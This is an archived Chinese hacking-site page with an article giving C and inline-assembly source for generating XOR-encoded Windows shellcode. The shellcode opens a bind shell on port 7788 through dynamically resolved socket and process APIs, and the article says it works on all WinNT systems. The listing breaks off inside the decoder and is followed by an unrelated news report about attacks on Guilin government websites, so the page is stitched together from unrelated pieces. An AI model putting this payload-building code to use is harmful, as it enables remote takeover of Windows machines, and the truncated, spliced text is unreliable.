📄 20054123551.htm
字号:
</tr>
<tr align="center">
<td>
<input type="SUBMIT" name="Action" value=" 查 询 " class="button2">
<input type="RESET" name="Clear" value=" 重 写 " class="button2">
</td>
</tr>
<tr align="center">
<td height="10"></td>
</tr>
</form>
</table></td>
</tr>
<tr>
<td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
<tr><td width="181" height="20" align="center" bgcolor="#CC9900">分类最新文章</td>
</tr>
<tr><td><a href=20054282302.htm target=_blank>ffffffffffffff</a></td></tr><tr><td><a href=20054123551.htm target=_blank>使用C语言编写提取通用she</a></td></tr><tr><td><a href=200541232242.htm target=_blank>抛砖引玉之自己动手学写脚本</a></td></tr><tr><td><a href=20053302254.htm target=_blank>Windows XP SP2</a></td></tr>
</table></td>
</tr>
<tr>
<td height="20"><table width="181" height="20" cellpadding="0" cellspacing="0">
<tr><td width="181" height="20" align="center" bgcolor="#CC9900">分类热门文章</td>
</tr>
<tr><td><a href=20053302254.htm target=_blank>Windows XP SP2</a></td></tr><tr><td><a href=20054123551.htm target=_blank>使用C语言编写提取通用she</a></td></tr><tr><td><a href=20054282302.htm target=_blank>ffffffffffffff</a></td></tr><tr><td><a href=200541232242.htm target=_blank>抛砖引玉之自己动手学写脚本</a></td></tr>
</table></td>
</tr>
</table></td>
<td width="628" valign="top" scope="col"><table width="100%" border="0" align="center" cellspacing="0" cellpadding="5" bordercolordark="#FFFFFF" bordercolorlight="#000000" style="word-break:break-all;">
<tr>
<td width="100%">
</td>
</tr>
<tr>
<td width="100%">
<div align="center">
<p class="style7"><SPAN class=style1>使用C语言编写提取通用shellcode的程序 </SPAN></p>
<hr size="1" color="#0a778b" width="100%">
发布时间:2005-4-1 被阅览数:<SCRIPT src="../../counter.asp?id=504"></SCRIPT> 次 作者:不祥
</div>
</td>
</tr>
<tr>
<td width="100%"><p class="style6"><P><FONT face=Verdana>说明:此程序可以用标准c语言string格式打印出你所在ShellCodes函数中编写的shellcode<BR> 用vc编译时请使用Release格式并取消优化设置,否则不能正常运行<BR>*/<BR>#include <windows.h><BR>#include <stdio.h><BR>#include <winioctl.h></FONT></P>
<P><FONT face=Verdana>#define DEBUG 1 //定义为调试模式。本地测试用。打印shellcode后立即执行shellcode</FONT></P>
<P><FONT face=Verdana>//<BR>//函数原型<BR>//<BR>void DecryptSc(); //shellcode解码函数,使用的是xor法加微调法<BR>void ShellCodes(); //shellcode的函数,因为使用了动态搜索API地址。所以所有WINNT系统通杀<BR>void PrintSc(char *lpBuff, int buffsize); //PrintSc函数用标准c格式打印</FONT></P>
<P><FONT face=Verdana>//<BR>//用到的部分定义<BR>//<BR>#define BEGINSTRLEN 0x08 //开始字符串长度<BR>#define ENDSTRLEN 0x08 //结束标记字符的长度<BR>#define nop_CODE 0x90 //填充字符,用于不确定shellcode入口用<BR>#define nop_LEN 0x0 //ShellCode起始的填充长度,真正shellcode的入口<BR>#define BUFFSIZE 0x20000 //输出缓冲区大小</FONT></P>
<P><FONT face=Verdana>#define sc_PORT 7788 //绑定端口号 0x1e6c<BR>#define sc_BUFFSIZE 0x2000 //ShellCode缓冲区大小</FONT></P>
<P><FONT face=Verdana>#define Enc_key 0x7A //编码密钥</FONT></P>
<P><FONT face=Verdana>#define MAX_Enc_Len 0x400 //加密代码的最大长度 1024足够?<BR>#define MAX_Sc_Len 0x2000 //hellCode的最大长度 8192足够?<BR>#define MAX_api_strlen 0x400 //APIstr字符串的长度<BR>#define API_endstr "strend"//API结尾标记字符串 <BR>#define API_endstrlen 0x06 //标记字符串长度<BR>//定义函数开始字符,定位用<BR>#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\<BR> __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90<BR>#define PROC_END PROC_BEGIN<BR>//---------------------------------------------------<BR>enum{ //Kernel32中的函数名定义,用于编写自定义的shellcode。下同<BR> _CreatePipe,<BR> _CreateProcessA,<BR> _CloseHandle,<BR> _PeekNamedPipe,<BR> _ReadFile,<BR> _WriteFile,<BR> _ExitProcess,</FONT></P>
<P><FONT face=Verdana> //WS2_32<BR> _WSAStartup,<BR>_WSASocket<BR>_socket,<BR> _bind,<BR> _listen,<BR> _accept,<BR> _send,<BR> _recv,<BR> _ioctlsocket,<BR> _closesocket,</FONT></P>
<P><FONT face=Verdana> //本机测试User32<BR> _MessageBeep,<BR> _MessageBoxA,<BR> API_num<BR>};</FONT></P>
<P><FONT face=Verdana>//<BR>//代码这里开始<BR>//<BR>int __cdecl main(int argc, char **argv)<BR>{<BR> //shellcode中要用到的字符串<BR> static char ApiStr[]="\x1e\x6c" //端口地址7788</FONT></P>
<P><FONT face=Verdana> //Kernel32中查找的API函数名称,用来查找函数地址,下同<BR> "CreatePipe""\x0"<BR> "CreateProcessA""\x0"<BR> "CloseHandle""\x0"<BR> "PeekNamedPipe""\x0"<BR> "ReadFile""\x0"<BR> "WriteFile""\x0"<BR> "ExitProcess""\x0"</FONT></P>
<P><FONT face=Verdana> //其它API中用到的API<BR> "wsock32.dll""\x0"<BR> "socket""\x0"<BR> "bind""\x0"<BR> "listen""\x0"<BR> "accept""\x0"<BR> "send""\x0"<BR> "recv""\x0"<BR> "ioctlsocket""\x0"<BR> "closesocket""\x0"<BR> //本机测试<BR> "user32.dll""\x0"<BR> "MessageBeep""\x0"<BR> "MessageBoxA""\x0"</FONT></P>
<P><FONT face=Verdana> "\x0\x0\x0\x0\x0"<BR> "strend";</FONT></P>
<P><FONT face=Verdana> char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; //标记开始的字符串<BR> char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; //标记结束的字符串</FONT></P>
<P><FONT face=Verdana> char buff[BUFFSIZE]; //缓冲区<BR> char sc_buff[sc_BUFFSIZE]; //ShellCodes缓冲<BR> char *pDcrypt_addr,<BR> *pSc_addr;</FONT></P>
<P><FONT face=Verdana> int buff_len; //缓冲长度<BR> int EncCode_len; //加密编码代码长度<BR> int Sc_len; //原始ShellCode的长度</FONT></P>
<P><FONT face=Verdana> int i,k;<BR> unsigned char ch;</FONT></P>
<P><FONT face=Verdana> //<BR> //获得DecryptSc()地址,解码函数的地址,然后搜索MAX_Enc_Len字节,查找标记开始的字符串<BR> //获得真正的解码汇编代码的开始地址,MAX_Enc_Len定义为1024字节一般这已经足够了,然后将这<BR> //部分代码拷贝入待输出ShellCode的缓冲区准备进一步处理<BR> //<BR> pDcrypt_addr=(char *)DecryptSc;</FONT></P>
<P><FONT face=Verdana> //定位其实际地址,因为在用Visual Studio生成调试版本调试的情况下,编译器会生成跳转表,<BR> //从跳转表中要计算得出函数实际所在的地址,这只是为了方便用VC调试</FONT></P>
<P><FONT face=Verdana> ch=*pDcrypt_addr;<BR> if (ch==0xe9)<BR> {<BR> pDcrypt_addr++;<BR> i=*(int *)pDcrypt_addr;<BR> pDcrypt_addr+=(i+4); //此时指向DecryptSc函数的实际地址<BR> }<BR> //找到解码代码的开始部分<BR> for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;</FONT></P>
<P><FONT face=Verdana> if (k<MAX_Enc_Len) pDcrypt_addr+=(k+8); //如找到定位实际代码的开始<BR> else <BR> {<BR> //显示错误信息<BR> k=0;<BR> printf("\nNo Begin str defined in Decrypt function!Please Check before go on...\n");<BR> return 0;<BR> }</FONT></P>
<P><FONT face=Verdana> for(k=0;k<MAX_Enc_Len;++k) if(memcmp(pDcrypt_addr+k,fnend_str,ENDSTRLEN)==0) break;</FONT></P>
<P><FONT face=Verdana> if (k<MAX_Enc_Len) EncCode_len=k;<BR> else <BR> {<BR> k=0;<BR> printf("\nNo End str defined in Decrypt function!Please Check....\n");<BR> return 0;<BR> }</FONT></P>
<P><FONT face=Verdana> memset(buff,nop_CODE,BUFFSIZE); //缓冲区填充<BR> memcpy(buff+nop_LEN,pDcrypt_addr,EncCode_len); //把DecryptSc代码复制进buff</FONT></P>
<P><FONT face=Verdana> //<BR> //处理ShellCode代码,如果需要定位到代码的开始<BR> //<BR> pSc_addr=(char *)ShellCodes; //定位shellcode的地址</FONT></P>
<P><FONT face=Verdana> //调试状态下的函数地址处理,便于调试<BR> ch=*pSc_addr;<BR> if (ch==0xe9)<BR> {<BR> pSc_addr++;<BR> i=*(int *)pSc_addr;<BR> pSc_addr+=(i+4); //此时指向ShellCodes函数的实际地址<BR> }</FONT></P>
<P><FONT face=Verdana> //如果需要定位到实际ShellCodes()的开始,这个版本中是不需要的<BR> /*<BR> for (k=0;k<MAX_Sc_Len ;++k ) if(memcmp(pSc_addr+k,fnbgn_str,BEGINSTRLEN)==0) break;<BR> if (k<MAX_Enc_Len) pSc_addr+=(k+8); //如找到定位实际代码的开始<BR> */</FONT></P>
<P><FONT face=Verdana> //找到shellcode的结尾及长度<BR> for(k=0;k<MAX_Sc_Len;++k) if(memcmp(pSc_addr+k,fnend_str,ENDSTRLEN)==0) break;<BR> if (k<MAX_Sc_Len) Sc_len=k;<BR> else <BR> {<BR> k=0;<BR> printf("\nNo End str defined in ShellCodes function!Please Check....\n");<BR> return 0;<BR> }</FONT></P><FONT face=Verdana>
<P><BR> //把shellcode代码复制进sc_buff<BR> memcpy(sc_buff,pSc_addr,Sc_len);</P>
<P> //把字符串拷贝在shellcode的结尾<BR> for(i=0;i<MAX_api_strlen;++i) if(memcmp(ApiStr+i,"strend",API_endstrlen)==0) break;<BR> if(i>=MAX_api_strlen)<BR> {<BR> printf("\nNo End str defined in API strings!Please Check....\n");<BR> return 0;<BR> }<BR> memcpy(sc_buff+k,ApiStr,i);</P>
<P> Sc_len+=i; //增加shellcode的长度</P>
<P> //<BR> //对shellcode进行编码,算法简单,可根据需要改变<BR> //<BR> k=EncCode_len+nop_LEN; //定位缓冲区应存放ShellCode地址的开始</P>
<P> for(i=0;i<Sc_len;++i){</P>
<P> ch=sc_buff[i]^Enc_key;<BR> //对一些可能造成shellcode失效的字符进行替换,即微调法<BR> if(ch<=0x1f||ch==' '||ch=='.'||ch=='/'||ch=='\\'||ch=='0'||ch=='?'||ch=='%'||ch=='+')<BR> {<BR> buff[k]='0';<BR> ++k;<BR> ch+=0x31;<BR> }<BR> //把编码过的shellcode放在DecryptSc代码后面<BR> buff[k]=ch;<BR> ++k;<BR> }</P>
<P> //shellcode的总长度<BR> buff_len=k;</P>
<P> //打印出shellcode<BR> PrintSc(buff,buff_len);<BR> //buff[buff_len]=0;<BR> //printf("%s",buff);</P>
<P>#ifdef DEBUG<BR> _asm{<BR> lea eax,buff<BR> jmp eax<BR> ret<BR> }<BR>#endif</P>
<P> return 0;<BR>}</P>
<P>//解码shellcode的代码<BR>void DecryptSc()<BR>{<BR> __asm{</P>
<P>/////////////////////////<BR>//定义开始标志<BR>/////////////////////////<BR> PROC_BEGIN //C macro to begin proc</P>
<P> jmp next<BR>getEncCodeAddr:<BR> pop edi<BR> push edi<BR> pop esi<BR> xor ecx,ecx<BR>Decrypt_lop: <BR> lodsb<BR> cmp al,cl<BR> jz shell<BR> cmp al,0x30 //判断是否为特殊字符<BR> jz special_char_clean //是则跳到special_char_clean</P>
<P> </P>
<P><BR>--------------------------------------------------------------------------------<BR>http://www.hackbase.com 阅读: 时间:2005-2-2 7:02:03 来源:www.hackbase.com <BR>桂林生活网-桂林日报 </P>
<P> 本报热线记者接到来自桂林市公安局网监部门的消息:最近,桂林市的一些政府部门和企业信息中心及网站连续多次遭到来自网络黑客的攻击,严重影响了这些部门和单位的正常工作和网络资源的使用。 </P>
<P> 记者在采访中得知,从去年11月份开始,桂林市政府某部门信息中心的网站连续多次遭到拒绝服务式攻击,使得整个服务器系统资源耗尽,导致整个系统的网站死机。该信息中心为防止损失进一步扩大,及时向桂林市公安局网监部门报案。经初步排查,发现由于该信息中心网站刚组建,网络安全体系的安全措施不完善,漏洞比较多;同时发现比较可疑的攻击源来自于该部门下属的某学校,因此要求该信息中心先自行查证。 </P>
<P> 今年一月份,该信息中心又连续遭到黑客以ASP注入式的攻击,导致整个信息中心的网站都被黑客所控制,并使在该中心托管的十几个网页被黑客修改或更换,直致整个系统的瘫痪。 </P>
<P> 据该中心负责同志介绍,该中心负责管理的网站共有60多个,还有个人网页80多个,主要用于电子化办公和信息发布。由于技术手段和网络安全设备的限制,所有的网站集中在两台服务器上。系统建成后,每天的访问量非常大,来自各个地方的攻击也特别多,几乎每天都遭受不同程度的攻击,存在较大安全隐患。只要其中任何一个网站或网页的一个程序设定不严,就极有可能使服务器遭到黑客攻击。 </P>
<P> 据桂林市公安局网监部门调查,该中心频繁遭到黑客攻击的原因主要有以下几个方面:一是该中心下属单位的一台电脑在上网过程中因浏览了不良网站而中了木马程序,被黑客所控制,做为傀儡机和攻击源使用,随时可向目标发起黑客攻击;另外,该下属单位也没有采取必要的网络安全技术措施;没有相关的网络安全组织;同时也没有按照国家的有关规定到公安网监部门进行国际互联网的备案登记。 </P>
<P> 为此,桂林市公安网监部门提醒各互联网接入单位:最近,网络黑客活动比较频繁,必须引起高度重视,及时采取相关的网络安全技术防范措施,按照国家有关规定到公安网监部门进行备案登记并与公安网监部门建立联系机制,如遇黑客攻击或其他网络安全问题,请做好现场保护工作并及时向市公安网监部门报告,协助公安机关共同做好网络安全问题的防范工作。</FONT></P></p>
<p><img src="http://www.koyee.com/images/dgg.gif" height="70" width="587"> </p></td>
</tr>
<tr>
<td width="628" bordercolor="0" class="font1"><p>
<hr size="1" color="#0a778b" width="100%">
<table><tr><td width="269" align="center">上一篇: <a href=../95/200541234921.htm title=局域网内玩转远程协助>局域网内玩转远程协助</a> </td>
<td width="285" align="center">下一篇: <a href=../90/200542823048.htm title=gew>gew</a></td>
</tr></table>
<hr size="1" color="#0a778b" width="100%">
<div align="right"> <a href="javascript:window.print()"><img src="../../images/printer.gif" width="16" height="14" border="0" align="absmiddle">打印本页</a> | <a href="javascript:window.close()"><img src="../../images/close.gif" width="14" height="14" border="0" align="absmiddle">关闭窗口</a> </div>
<p></p></td>
</tr>
</table></td>
</tr>
</table>
<TABLE height=62 cellSpacing=0 cellPadding=0 width="800"
align=center background=../../images/webtop_bg.gif
border=0>
<TBODY>
<TR>
<TD><div align="center" class="style4">Copyright @ 2004-2008 http://www.koyee.com 可以网络在线版权所有<br>
公司地址:江西南昌 电话:13879173467 邮编:330029<br>
email:chenxueyan9999@163.com</div></TD>
</TR></TBODY></TABLE>
</BODY></HTML>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -